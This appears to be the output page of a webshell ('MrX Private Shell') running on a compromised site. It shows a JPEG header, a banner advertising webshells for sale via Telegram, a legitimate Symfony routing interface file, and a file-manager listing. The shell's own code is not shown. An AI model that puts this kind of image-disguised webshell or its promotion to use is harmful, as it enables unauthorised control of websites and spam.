����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Component\Routing\Matcher;
/**
* RedirectableUrlMatcherInterface knows how to redirect the user.
*
* @author Fabien Potencier <fabien@symfony.com>
*
* @api
*/
interface RedirectableUrlMatcherInterface
{
/**
* Redirects the user to another URL.
*
* @param string $path The path info to redirect to.
* @param string $route The route name that matched
* @param string|null $scheme The URL scheme (null to keep the current one)
*
* @return array An array of parameters
*
* @api
*/
public function redirect($path, $route, $scheme = null);
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Dumper | Folder | 0755 |
|
|
| ApacheUrlMatcher.php | File | 3.36 KB | 0644 |
|
| RedirectableUrlMatcher.php | File | 1.85 KB | 0644 |
|
| RedirectableUrlMatcherInterface.php | File | 870 B | 0644 |
|
| RequestMatcherInterface.php | File | 1.17 KB | 0644 |
|
| TraceableUrlMatcher.php | File | 4.63 KB | 0644 |
|
| UrlMatcher.php | File | 7.03 KB | 0644 |
|
| UrlMatcherInterface.php | File | 1.26 KB | 0644 |
|